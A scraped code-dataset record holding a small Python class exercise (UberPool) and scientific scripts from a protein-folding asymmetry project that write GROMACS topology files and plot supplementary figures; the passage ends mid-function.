metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jomilto/cursoPOOUber",
"score": 3
} |
#### File: cursoPOOUber/Python/uberPool.py
```python
from car import Car
class UberPool(Car):
brand = str
model = str
def __init_(self,license,driver,brand,model):
super.__init__(license,driver)
self.brand = brand
self.model = model
``` |
{
"source": "jomimc/FoldAsymCode",
"score": 2
} |
#### File: MD_simulations/Src/write_topology.py
```python
from itertools import product
import os
import sys
import numpy as np
from scipy.optimize import minimize
from scipy.spatial import distance_matrix
import read_gro
HEADER = """
; Topology file generated from Go-kit.\n
; https://github.org/gokit1/gokit/\n
[ defaults ]\n
; nbfunc comb-rule gen-pairs\n
1 1 no \n
\n
[ atomtypes ]\n
; name mass charge ptype c6 c12\n
CA 1.000 0.000 A 0.000000e+00 1.677722e-05 \n
\n
[ moleculetype ]\n
; name nrexcl\n
Macromolecule 3\n
\n
"""
def write_gro(f, atype, res, xyz, vel, header='Header'):
if len(vel):
xyz = [''.join([f"{round(x,3):8.3f}" for x in list(res) + list(v)]) for res, v in zip(xyz, vel)]
else:
xyz = [''.join([f"{round(x,3):8.3f}" for x in res]) for res in xyz]
idx = [str(i+1) for i in range(len(xyz))]
with open(f, 'w') as o:
o.write(f"{header}\n")
o.write(f"{len(idx)}\n")
for i, t, r, coords in zip(idx, atype, res, xyz):
o.write(f"{i:>5s}{r:<4s}{t:>6s}{i:>5s}{coords}\n")
o.write(" 50.0000"*3 + "\n")
def write_wall_tmp(f, xyz, start, head='Header'):
t = 'CA'
idx = [str(i+start) for i in range(len(xyz))]
r = 'WALL'
with open(f, 'w') as o:
o.write(f"{head}\n")
for i, (x, y, z) in zip(idx, xyz):
o.write(f"{i+r:>8s}{t:>7s}{i:>5s}{round(x,3):8.3f}{round(y,3):8.3f}{round(z,3):8.3f}\n")
o.write(" 50.0000"*3 + "\n")
def write_general(f, lines, nl='\n'):
with open(f, 'w') as o:
for l in lines:
o.write(f"{l}{nl}")
def write_topology(ref_file, top_file, rest_p, N):
topology = [l for l in open(ref_file, 'r')]
start_top = ''.join(topology[:-7])
end_top = ''.join(topology[-7:])
# Add restraints to protein
rest_top1 = '[ position_restraints ]\n; ai funct fcx fcy fcz\n' + \
''.join([f"{i:>4d}{1:>6d}{1000:>7d}{1000:>7d}{1000:>7d}\n" for i in rest_p])
# Add wall molecules
mol_top = '[ moleculetype ]\n; name nrexcl\n WALL 3 \n'
atoms_top = '[ atoms ]\n;nr type resnr residue atom cgnr\n' + \
''.join([f"{i:>8d} CA 1 WALL CA{i:>8d}\n" for i in [1]])
rest_top2 = '[ position_restraints ]\n; ai funct fcx fcy fcz\n' + \
''.join([f"{i:>4d}{1:>6d}{1000:>7d}{1000:>7d}{1000:>7d}\n" for i in [1]])
end_top += f'WALL {N}\n'
topology_str = '\n'.join([start_top, rest_top1, mol_top, atoms_top, rest_top2, end_top])
with open(top_file, 'w') as o:
o.write(topology_str)
if __name__ == "__main__":
f = sys.argv[1]
N, box, atype, res, xyz, vel = read_gro.load_gro(f)
if len(vel):
write_gro('gromacs.gro', atype, res, xyz, vel)
else:
write_gro('gromacs.gro', atype, res, xyz)
```
#### File: FoldAsymCode/Src/si_figs.py
```python
from collections import defaultdict, Counter
from itertools import product, permutations
from glob import glob
import json
import os
from pathlib import Path
import pickle
import sqlite3
import string
import sys
import time
import matplotlib as mpl
from matplotlib import colors
from matplotlib import pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
import matplotlib.patches as mpatches
from multiprocessing import Pool
import numpy as np
import pandas as pd
from palettable.colorbrewer.qualitative import Paired_12
from palettable.colorbrewer.diverging import PuOr_5, RdYlGn_6, PuOr_10, RdBu_10
from palettable.scientific.diverging import Cork_10
from scipy.spatial import distance_matrix, ConvexHull, convex_hull_plot_2d
from scipy.stats import linregress, pearsonr, lognorm
import seaborn as sns
import svgutils.compose as sc
import asym_io
from asym_io import PATH_BASE, PATH_ASYM, PATH_ASYM_DATA
import asym_utils as utils
import folding_rate
import paper_figs
import structure
PATH_FIG = PATH_ASYM.joinpath("Figures")
PATH_FIG_DATA = PATH_FIG.joinpath("Data")
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
####################################################################
### SI Figures
####################################################################
### FIG 1
def fig1(df, nx=3, ny=3, N=50):
fig, ax = plt.subplots(nx,ny, figsize=(12,12))
ax = ax.reshape(ax.size)
fig.subplots_adjust(hspace=.5)
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
cat = 'HS.D'
scop_desc = {row[1]:row[2] for row in pd.read_csv(PATH_BASE.joinpath('SCOP/scop-des-latest.txt')).itertuples()}
CF_count = sorted(df.CF.value_counts().items(), key=lambda x:x[1], reverse=True)[1:]
bold_idx = [0, 1, 2, 6, 8]
for i in range(nx*ny):
cf_id, count = CF_count[i]
countN, countC = utils.pdb_end_stats_disorder_N_C(df.loc[df.CF==cf_id], N=N, s1='SEQ_PDB2', s2='SS_PDB2')
base = np.zeros(len(countN['S']), dtype=float)
Yt = np.array([[sum(p.values()) for p in countN[s]] for s in cat]).sum(axis=0)
X = np.arange(base.size)
for j, s in enumerate(cat):
YN = np.array([sum(p.values()) for p in countN[s]])
YC = np.array([sum(p.values()) for p in countC[s]])
ax[i].plot(YN/Yt, '-', c=col[j], label=f"{s} N")
ax[i].plot(YC/Yt, ':', c=col[j], label=f"{s} C")
if i in bold_idx:
ax[i].set_title(f"{scop_desc[int(cf_id)][:40]}\nTotal sequences: {count}", fontweight='bold')
else:
ax[i].set_title(f"{scop_desc[int(cf_id)][:40]}\nTotal sequences: {count}")
ax[i].set_xlabel('Sequence distance from ends')
if not i%3:
ax[i].set_ylabel('Secondary\nstructure\nprobability')
handles = [Line2D([0], [0], ls=ls, c=c, label=l) for ls, c, l in zip(['-', '--'], ['k']*2, ['N', 'C'])] + \
[Line2D([0], [0], ls='-', c=c, label=l) for l, c in zip(lbls, col)]
ax[1].legend(handles=handles, bbox_to_anchor=(1.40, 1.45), frameon=False,
ncol=6, columnspacing=1.5, handlelength=2.0)
fig.savefig(PATH_FIG.joinpath("si1.pdf"), bbox_inches='tight')
####################################################################
### FIG 2
def fig2():
pfdb = asym_io.load_pfdb()
fig, ax = plt.subplots(1,2, figsize=(10,5))
fig.subplots_adjust(wspace=0.3)
X1 = np.log10(pfdb.loc[pfdb.use, 'L'])
X2 = np.log10(pfdb.loc[pfdb.use, 'CO'])
Y = pfdb.loc[pfdb.use, 'log_kf']
sns.regplot(X1, Y, ax=ax[0])
sns.regplot(X2, Y, ax=ax[1])
print(pearsonr(X1, Y))
print(pearsonr(X2, Y))
ax[0].set_ylabel(r'$\log_{10} k_f$')
ax[1].set_ylabel(r'$\log_{10} k_f$')
ax[0].set_xlabel(r'$\log_{10}$ Sequence Length')
ax[1].set_xlabel(r'$\log_{10}$ Contact Order')
fs = 14
for i, b in zip([0,1], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si2.pdf"), bbox_inches='tight')
####################################################################
### FIG 3
def fig3(pdb, Y='S_ASYM'):
LO = folding_rate.get_folding_translation_rates(pdb.copy(), which='lo')
HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='hi')
fig, ax = plt.subplots()
lbls = ['Fit', r"$95\% CI$", r"$95\% CI$"]
for i, d in enumerate([pdb, LO, HI]):
print(f"{i}: frac R less than 0 = {utils.R_frac_1(d)}")
print(f"{i}: Euk frac (.1 < R < 10) = {utils.R_frac_2(d, k=5)}")
print(f"{i}: Prok frac (.1 < R < 10) = {utils.R_frac_2(d, k=10)}")
print(f"{i}: frac R faster than 'speed-limit' = {utils.R_frac_3(d)}")
print(f"{i}: frac R slower than 20 minutes = {utils.R_frac_4(d)}")
print()
sns.distplot(d['REL_RATE'], label=lbls[i], color=col[i])
ax.legend(loc='best', frameon=False)
ax.set_xlim(-6, 6)
ax.set_xlabel(r'$\log_{10}R$')
ax.set_ylabel('Density')
fig.savefig(PATH_FIG.joinpath("si3.pdf"), bbox_inches='tight')
####################################################################
### FIG 4
def fig4(pdb, Y='S_ASYM'):
LO = folding_rate.get_folding_translation_rates(pdb.copy(), which='lo')
HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='hi')
# For the results using only 2-state proteins...
# HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='best', only2s=True)
fig = plt.figure(figsize=(8,10.5))
gs = GridSpec(5,12, wspace=0.5, hspace=0.0, height_ratios=[1,0.5,1,0.5,1.5])
ax = [fig.add_subplot(gs[i*2,j*4:(j+1)*4]) for i in [0,1] for j in [0,1,2]] + \
[fig.add_subplot(gs[4,:5]), fig.add_subplot(gs[4,7:])]
X = np.arange(10)
width = .35
ttls = [r'$\alpha$ Helix', r'$\beta$ Sheet']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[0]
c_sheet = custom_cmap[12]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
for k, pdb in enumerate([LO, HI]):
quantiles = pdb['REL_RATE'].quantile(np.arange(0,1.1,.1)).values
pdb['quant'] = pdb['REL_RATE'].apply(lambda x: utils.assign_quantile(x, quantiles))
enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath("fig3_enrich.pickle"), 'rb'))
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
if i:
ax[k*3+i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[k*3+i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
else:
ax[k*3+i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
ax[k*3+i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[k*3+i].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[k*3+i].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
ax[k*3+2].barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax[k*3+2].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
for i in [0,2]:
ax[k*3+i].set_yticks(np.arange(len(quantiles))*sep)
ax[k*3+i].set_yticklabels([round(x,1) for x in quantiles])
for i in range(2):
ax[k*3+i].spines['top'].set_visible(False)
ax[k*3+i].spines['right'].set_visible(False)
for i in range(1,3):
ax[k*3+i].spines['left'].set_visible(False)
ax[k*3+i].spines['top'].set_visible(False)
for i in range(3):
ax[k*3+i].set_ylim(0-sep/4, (0.5+sep/4)*1.05)
ax[k*3+1].set_yticks([])
ax[k*3+2].yaxis.set_label_position('right')
ax[k*3+2].yaxis.tick_right()
ax[k*3+0].set_xlabel(r"asym$_{\alpha}$")
ax[k*3+1].set_xlabel(r"asym$_{\beta}$")
ax[k*3+0].set_ylabel(r'$\log_{10}R$')
ax[k*3+2].set_xlabel('N terminal\nEnrichment')
plot_metric_space(fig, ax[6:])
fs = 14
for i, b in zip([0,3,6], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si4.pdf"), bbox_inches='tight')
def get_ci_index(X, Y):
xlo = np.quantile(X, 0.025)
xhi = np.quantile(X, 0.975)
ylo = np.quantile(Y, 0.025)
yhi = np.quantile(Y, 0.975)
return np.where((X>=xlo)&(X<=xhi)&(Y>=ylo)&(Y<=yhi))[0]
def plot_hull(boot_fit, patt, ax='', c='k', lw=1):
idx = get_ci_index(*boot_fit[:,:2].T)
tmp = boot_fit[idx].copy()
hull = ConvexHull(np.array([boot_fit[idx,1], boot_fit[idx, 0]]).T)
for simplex in hull.simplices:
if not isinstance(ax, str):
ax.plot(tmp[simplex, 1], tmp[simplex, 0], patt, c=c, lw=lw)
else:
plt.plot(tmp[simplex, 1], tmp[simplex, 0], patt, c=c, lw=lw)
def plot_metric_space(fig, ax):
fit = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_met.pickle"), 'rb'))['AA']
boot_fit = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_param.pickle"), 'rb'))
boot_fit_0 = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_param_useall.pickle"), 'rb'))
X, Y = np.meshgrid(fit["c1"], fit["c2"])
cmap = colors.ListedColormap(sns.diverging_palette(230, 22, s=100, l=47, n=8))
bounds = np.linspace(-2, 2, 9)
norm = colors.BoundaryNorm(bounds, cmap.N)
im = []
ttls = ['Helices', 'Sheets']
for i in range(2):
im = ax[i].contourf(X, Y, fit['met'][:,:,i], bounds, cmap=cmap, vmin=-2, vmax=2, norm=norm)
cbar = fig.colorbar(im, ax=ax[i], fraction=0.046, pad=0.04, norm=norm, boundaries=bounds, ticks=bounds)
cbar.set_label(r"$R_{\mathregular{max}}$", labelpad=-5)
ax[i].set_xlabel('A')
ax[i].set_xlim(X.min(), X.max())
ax[i].set_ylabel('B')
ax[i].set_ylim(Y.max(), Y.min())
ax[i].invert_yaxis()
ax[i].set_aspect((np.max(X)-np.min(X))/(np.max(Y)-np.min(Y)))
ax[i].set_title(ttls[i])
col = ['k', '#79C726']
for i, boofi in enumerate([boot_fit, boot_fit_0]):
for j in range(2):
for bf, p in zip(boofi, ['-', ':']):
plot_hull(bf, p, ax[j], c=col[i])
c1 = [13.77, -6.07]
c1a = [11.36553036, -4.87716477]
c1b = [16.17819934, -7.27168306]
patt = ['*', 'o', 'o']
lbls = ['Fit', r"$95\% CI$", r"$95\% CI$"]
col = "#CB7CE6"
for i in range(2):
for coef, p, l in zip([c1, c1a, c1b], patt, lbls):
ax[i].plot([coef[0]], [coef[1]], p, label=l, fillstyle='none', ms=10, c=col, mew=2)
ax[i].legend(loc='best', frameon=False)
####################################################################
### FIG 5
def fig5():
fig, ax = plt.subplots(2,1)
fig.subplots_adjust(hspace=0.3)
bins = np.arange(0,620,20)
X = [bins[:-1] + np.diff(bins[:2])]
bins = np.arange(0,61,2.0)
X.append(bins[:-1] + np.diff(bins[:2]))
yellows = sns.diverging_palette(5, 55, s=95, l=77, n=13)
pinks = sns.diverging_palette(5, 55, s=70, l=52, n=13)
col = [yellows[12], pinks[0]]
col2 = [yellows[10], pinks[3]]
data = [pickle.load(open(PATH_FIG_DATA.joinpath(f"dom_{x}_dist_boot.pickle"), 'rb')) for x in ['aa', 'smco']]
for j in range(2):
for i in [1,2]:
MEAN, LO, HI = [np.array(x) for x in data[j][f"pos{i}"]]
ax[j].plot(X[j], MEAN, '--', c=col[i-1], label=f'position {i}')
ax[j].fill_between(X[j], LO, HI, color=col2[i-1], alpha=0.5)
ax[0].set_xlabel('Sequence Length')
ax[1].set_xlabel('Contact Order')
ax[0].set_ylabel('Density')
ax[1].set_ylabel('Density')
ax[0].legend(loc='upper right', frameon=False)
fig.savefig(PATH_FIG.joinpath("si5.pdf"), bbox_inches='tight')
####################################################################
### FIG 6
def fig6(X='REL_RATE', Y='S_ASYM'):
fig, ax = plt.subplots(1,2, figsize=(10,4))
fig.subplots_adjust(hspace=0.7, wspace=0.3)
sep = 0.40
col = Paired_12.hex_colors[5]
ttls = [f"Position {i}" for i in range(1,3)]
dom_pos_boot = pickle.load(open(PATH_FIG_DATA.joinpath("dom_pos_boot.pickle"), 'rb'))
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[11]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
# ttls = ["Two-domain", "Three-domain"]
xlbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
for i in range(2):
for j, (pos, dat) in enumerate(dom_pos_boot[2].items()):
quantiles = dat[0].mean(axis=0)
mean = dat[1][:,i,:].mean(axis=0)
lo = np.abs(np.quantile(dat[1][:,i,:], 0.025, axis=0) - mean)
hi = np.abs(np.quantile(dat[1][:,i,:], 0.975, axis=0) - mean)
ax[j].bar(np.arange(10)+(i+1)*sep, mean, sep, yerr=(lo, hi), color=col[i], label=xlbls[i], alpha=0.7, error_kw={'lw':.8})
ax[j].set_xticks(np.arange(len(quantiles)))
ax[j].set_xticklabels(np.round(quantiles, 1), rotation=90)
ax[i].spines['top'].set_visible(False)
ax[i].spines['right'].set_visible(False)
ax[i].set_title(ttls[i], loc='left')
ax[i].set_xlabel(r'$\log_{10}R$')
# ax[i,k].set_ylabel('N terminal\nEnrichment')
ax[i].set_ylabel("N Terminal Enrichment")
ax[0].legend(bbox_to_anchor=(1.17, 1.12), frameon=False, ncol=3)
fig.savefig(PATH_FIG.joinpath("si6.pdf"), bbox_inches='tight')
####################################################################
### FIG 7
def fig7(pdb, Y='D_ASYM'):
fig, ax = plt.subplots(3,3, figsize=(12,8))
fig.subplots_adjust(hspace=0.5, wspace=0.5)
sep = 0.05
col = Paired_12.hex_colors[7]
xlbls = [r'$\log_{10} R$', 'Sequence Length', 'Contact Order']
ttls = ['Full sample', 'Eukaryotes', 'Prokaryotes']
for k, df in enumerate([pdb, pdb.loc[pdb.k_trans==5], pdb.loc[pdb.k_trans==10]]):
for i, X in enumerate(['REL_RATE', 'AA_PDB', 'CO']):
quantiles = df[X].quantile(np.arange(0,1.1,.1)).values
df['quant'] = df[X].apply(lambda x: utils.assign_quantile(x, quantiles))
ratio = []
for j in range(len(quantiles)-1):
left = len(df.loc[(df.quant==j)&(df[Y]<0)]) / max(1, len(df.loc[(df.quant==j)]))
right = len(df.loc[(df.quant==j)&(df[Y]>0)]) / max(1, len(df.loc[(df.quant==j)]))
ratio.append((right - left))
# print(ratio)
ax[i,k].bar([sep*j+sep/2 for j in range(10)], ratio, sep/2, color=[col if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[i,k].set_xticks(np.arange(len(quantiles))*sep)
if i == 1:
ax[i,k].set_xticklabels([int(x) for x in quantiles], rotation=90)
else:
ax[i,k].set_xticklabels([round(x,1) for x in quantiles], rotation=90)
ax[i,k].set_xlabel(xlbls[i])
ax[i,k].set_ylabel('N terminal\nEnrichment')
ax[0,k].set_title(ttls[k])
fig.savefig(PATH_FIG.joinpath("si7.pdf"), bbox_inches='tight')
####################################################################
### FIG 8
def fig8(df_pdb):
fig = plt.figure()
gs = GridSpec(2,1, wspace=0.0, height_ratios=[.5,1])
ax = [fig.add_subplot(gs[1,0]), fig.add_subplot(gs[0,0])]
X = np.arange(-3, 3, 0.01)
Y = np.array([(10**x + 1)/max(10**x, 1) for x in X])
Y2 = (1+10**X) / np.array([max(1, 10**x+30./100.) for x in X])
ax[0].plot(X, Y, '-', label=r"$\tau_{ribo}=0$")
ax[0].plot(X, Y2, ':', label=r"$\tau_{ribo}=0.3\tau_{trans}$")
lbls = ['1ILO', '2OT2', '3BID']
patt = ['o', 's', '^']
for l, p in zip(lbls, patt):
X, Y = np.load(PATH_FIG_DATA.joinpath(f"{l}.npy"))
ax[0].plot(X, Y, p, label=l, alpha=0.5, mec='k', ms=7)
ax[0].set_xlim(-2.3, 2.3)
ax[0].set_ylim(1, 2.05)
ax[0].set_xlabel(r'$\log_{10} R$')
ax[0].set_ylabel("Speed-up")
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[0].legend(loc='upper right', frameon=False, bbox_to_anchor=(1.05, 1.00), ncol=1, labelspacing=.1)
fig8a(df_pdb, ax[1])
fig.savefig(PATH_FIG.joinpath("si8.pdf"), bbox_inches='tight')
def fig8a(df_pdb, ax):
lbls = ['2OT2', '1ILO', '3BID']
idx = [98212, 19922, 127370]
SS = df_pdb.loc[idx, 'SS_PDB2'].values
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
col_key = {'.':'grey', 'D':'grey', 'H':custom_cmap[3], 'S':custom_cmap[9]}
ec_key = {'.':'grey', 'D':'grey', 'H':custom_cmap[1], 'S':custom_cmap[11]}
wid_key = {'.':0.1, 'D':0.1, 'H':0.3, 'S':0.3}
lw_key = {'.':0.7, 'D':0.7, 'H':1.5, 'S':1.5}
for i, ss in enumerate(SS):
left = 0.
for j, strand in enumerate(new_figs.generate_strand(ss)):
s = strand[0]
ax.barh([i], [len(strand)], wid_key[s], left=[left], color=col_key[s], ec=ec_key[s], linewidth=lw_key[s])
left += len(strand) + 0.20
ax.annotate("N", xy=(-0.01, 1.0), xycoords='axes fraction')
ax.annotate("C", xy=(0.59, 1.0), xycoords='axes fraction')
for pos in ['left', 'right', 'top', 'bottom']:
ax.spines[pos].set_visible(False)
col = np.array(custom_cmap)[[3,9,1,11]]
ax.legend(handles=[mpatches.Patch(fc=c1, ec=c2, label=l) for c1, c2, l in zip(col[:2], col[2:], ['Helix', 'Sheet'])],
loc='upper right', frameon=False, ncol=1, bbox_to_anchor=(0.95, 1.10))
ax.set_xticks([])
ax.set_yticks(range(3))
ax.set_yticklabels(lbls)
ax.tick_params(axis='y', which='major', length=0, pad=10)
####################################################################
### FIG 9
def fig9(pdb, s='S'):
pdb = pdb.loc[(pdb.USE_RSA)]
pdb = pdb.loc[(pdb.SS_PDB2.str.len()==pdb.RSA.apply(len))]
path = PATH_FIG_DATA.joinpath("RSA_quantiles.pickle")
if path.exists():
quantiles, euk_quantiles, prok_quantiles = pickle.load(open(path, 'rb'))
else:
quantiles = [np.quantile([x for y in pdb['RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
euk_quantiles = [np.quantile([x for y in pdb.loc[pdb.k_trans==5, 'RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
prok_quantiles = [np.quantile([x for y in pdb.loc[pdb.k_trans==10, 'RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
pickle.dump([quantiles, euk_quantiles, prok_quantiles], open(path, 'wb'))
print(quantiles)
# fig, ax = plt.subplots(4,3, figsize=(8,8))
# fig.subplots_adjust(wspace=0.5)
fig = plt.figure(figsize=(12,9))
gs = GridSpec(5,3, wspace=0.3, height_ratios=[1,1,1,1,1])
ax = [fig.add_subplot(gs[j,i]) for i in range(3) for j in [0,1]] + \
[fig.add_subplot(gs[j,i]) for i in range(3) for j in [3,4]]
print("All proteins, all SS")
fig9a(pdb['RSA'], pdb['SS_PDB2'], quantiles, ax[:2], s='SH.D')
print("euk proteins, all ss")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[2:4], s='SH.D')
print("Prok proteins, all SS")
fig9a(pdb.loc[pdb.k_trans==10, 'RSA'], pdb.loc[pdb.k_trans==10, 'SS_PDB2'], prok_quantiles, ax[4:6], s='SH.D')
print("Euk proteins, only SHC")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[6:8], s='SH.')
print("Euk proteins, only S")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[8:10], s='S')
print("Prok proteins, only S")
fig9a(pdb.loc[pdb.k_trans==10, 'RSA'], pdb.loc[pdb.k_trans==10, 'SS_PDB2'], prok_quantiles, ax[10:12], s='S')
ttls = ['All proteins\nAll residues', 'Eukaryotic proteins\nAll residues', 'Prokaryotic proteins\nAll residues',
'Eukaryotic proteins\nHelix, sheet and coil', 'Eukaryotic proteins\nOnly Sheets', 'Prokaryotic proteins\nOnly Sheets']
col = np.array(list(Paired_12.hex_colors))[[0,2,4,6]]
lbls = ['Buried', 'Middle', 'Exposed']
ax[0].set_ylabel('Solvent accessibility\nprobability')
ax[1].set_ylabel('Solvent accessibility\nasymmetry\n$\\log_2 (N / C)$')
ax[6].set_ylabel('Solvent accessibility\nprobability')
ax[7].set_ylabel('Solvent accessibility\nasymmetry\n$\\log_2 (N / C)$')
handles = [Line2D([0], [0], ls=ls, c=c, label=l) for ls, c, l in zip(['-', '--'], ['k']*2, ['N', 'C'])] + \
[Line2D([0], [0], ls='-', c=c, label=l) for l, c in zip(lbls, col)]
ax[8].legend(handles=handles, bbox_to_anchor=(1.30, 1.85), frameon=False,
ncol=5, columnspacing=1.5, handlelength=2.0, labelspacing=2.0)
for i, a in enumerate(ax):
if i % 2:
ax[i].set_xticks(range(0, 60, 10))
ax[i].set_xlabel('Sequence distance from ends')
else:
ax[i].set_xticks([])
ax[i].set_title(ttls[i//2])
ax[i].set_xlim(0, 50)
fig.savefig(PATH_FIG.joinpath("si9.pdf"), bbox_inches='tight')
def fig9a(rsa_list, ss_list, quantiles, ax, s='S'):
cat = 'BME'
countN, countC = utils.sheets_rsa_seq_dist(rsa_list, ss_list, quantiles, ss_key=s)
col = np.array(list(Paired_12.hex_colors))[[0,2,4,6]]
base = np.zeros(len(countN[cat[0]]), dtype=float)
YtN = np.array(list(countN.values())).sum(axis=0)
YtC = np.array(list(countC.values())).sum(axis=0)
X = np.arange(base.size)
for i, s in enumerate(cat):
YN = countN[s]
YC = countC[s]
ax[0].plot(YN/YtN, '-', c=col[i], label=f"{s} N")
ax[0].plot(YC/YtC, ':', c=col[i], label=f"{s} C")
ax[1].plot(np.log2(YN/YC*YtC/YtN), '-', c=col[i], label=f"{s}")
print(s, np.round((np.sum(YN[:20]) / np.sum(YtN[:20])) / (np.sum(YC[:20]) / np.sum(YtC[:20])), 2))
ax[1].plot([0]*base.size, ':', c='k')
ax[0].set_ylim(0,1)
ax[1].set_ylim(-1,1)
for a in ax:
a.set_xlim(X[0], X[-1])
####################################################################
### FIG 10
def fig10(pdb):
pfdb = asym_io.load_pfdb()
acpro = asym_io.load_acpro()
fig = plt.figure(figsize=(12,9))
gs = GridSpec(3,7, wspace=0.0, width_ratios=[5,0.2,5,0.4,3,1.0,6], height_ratios=[1,.3,1])
ax = [fig.add_subplot(gs[2,i*2]) for i in range(4)] + \
[fig.add_subplot(gs[0,0:3]), fig.add_subplot(gs[0,5:])]
# sns.distplot(pdb.ln_kf, ax=ax[5], label='PDB - PFDB fit', hist=False)
pdb = pdb.copy()
coef = folding_rate.linear_fit(np.log10(acpro['L']), acpro['log_kf']).params
pdb['ln_kf'] = folding_rate.pred_fold(np.log10(pdb.AA_PDB), coef)
pdb = utils.get_rel_rate(pdb)
fig10a(fig, ax[4])
fig10b(fig, ax[:4], pdb)
# sns.distplot(pdb.ln_kf, ax=ax[5], label='PDB - ACPro fit', hist=False)
# sns.distplot(pfdb.log_kf, ax=ax[5], label='PFDB data', kde=False, norm_hist=True)
# sns.distplot(acpro["ln kf"], ax=ax[5], label='KDB data', kde=False, norm_hist=True)
sns.regplot(np.log10(acpro['L']), acpro['log_kf'], label='ACPro data', scatter_kws={"alpha":0.5})
sns.regplot(np.log10(pfdb.loc[pfdb.use, 'L']), pfdb.loc[pfdb.use, 'log_kf'], label='PFDB data', scatter_kws={"alpha":0.5})
ax[5].legend(loc='best', frameon=False)
ax[5].set_xlabel(r"$\log_{10}L$")
ax[5].set_ylabel(r"$\log_{10}k_f$")
fs = 14
for i, b in zip([4,5,0,2,3], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.16, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si10.pdf"), bbox_inches='tight')
def fig10a(fig, ax):
Rdist_data = pickle.load(open(PATH_FIG_DATA.joinpath("R_dist_acpro.pickle"), 'rb'))
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['All', 'Prokaryotes', 'Eukaryotes']
for i, k in enumerate(['All', 'Prok', 'Euk']):
ax.plot(Rdist_data['grid'], Rdist_data[k][0], '-', c=col[i], label=lbls[i])
ax.fill_between(Rdist_data['grid'], Rdist_data[k][1], Rdist_data[k][2], color=col[i], alpha=0.5)
ax.plot([0,0], [0, 0.60], ':', c='k', alpha=0.7)
ax.set_xlabel(r'$\log_{10} R$')
ax.set_ylabel('Density')
ax.set_xticks(np.arange(-6, 5, 2))
ax.set_xlim(-7, 2)
ax.set_ylim(0, 0.60)
ax.legend(loc='upper center', bbox_to_anchor=(0.55, 1.17), frameon=False, ncol=3, columnspacing=2)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
def fig10b(fig, ax, pdb, Y='S_ASYM'):
ft = 12
X = np.arange(10)
width = .35
ttls = [r'$\alpha$ Helix', r'$\beta$ Sheet']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
# col = np.array(Paired_12.hex_colors)[[1,5]]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[0]
c_sheet = custom_cmap[12]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
